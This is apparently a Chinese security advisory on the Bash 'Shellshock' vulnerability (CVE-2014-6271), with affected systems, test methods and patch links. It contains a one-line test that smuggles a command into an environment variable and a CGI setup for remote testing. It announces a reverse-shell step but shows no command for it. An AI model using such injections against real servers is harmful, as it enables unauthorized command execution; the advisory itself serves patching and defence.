9月25日,国外曝出一个“毁灭级”的Bash漏洞,黑客可利用此漏洞远程执行任意命令,完全控制目标系统!
该漏洞编号为CVE-2014-6271,主要存在于bash 1.14 - 4.3版本中,受影响的系统包括:Red Hat企业Linux (versions 4-7) 、Fedora distribution、CentOS (versions 5-7)、Ubuntu 10.04 LTS,12.04LTS和14.04 LTS、Debian等。
经验证,受此Bash漏洞影响最大的是网站和企业内网,以及一些路由器、VPN大型网站等网络设备。该漏洞暂未对安卓官方版本造成影响,但一些第三方Rom需要注意安全。
该漏洞可能被黑客制作成自动化攻击工具,从而针对网站、企业发动规模化攻击。由于漏洞攻击面广、影响范围大,其威胁丝毫不亚于OpenSSL心脏出血漏洞。
提醒广大网站和企业及时更新服务器安全补丁,避免造成重大危险。
“Bash”漏洞测试方法
1)、本地测试
env x='() { :;}; echo vulnerable'bash -c "echo this is a test"
2)、远程测试
首先用BASH写一个CGI
root@kali:/usr/lib/cgi-bin# cat bug.sh
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<metahttp-equiv="Content-Type" content="text/html;charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0
放到/usr/lib/cgi-bin里,然后用curl访问
能打印出环境变量了。说明能够正常访问了。下面反弹一个SHELL
访问看结果:
【建议修补方案 】
http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017
http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018
http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052
http://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039
http://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012
http://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048
http://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-025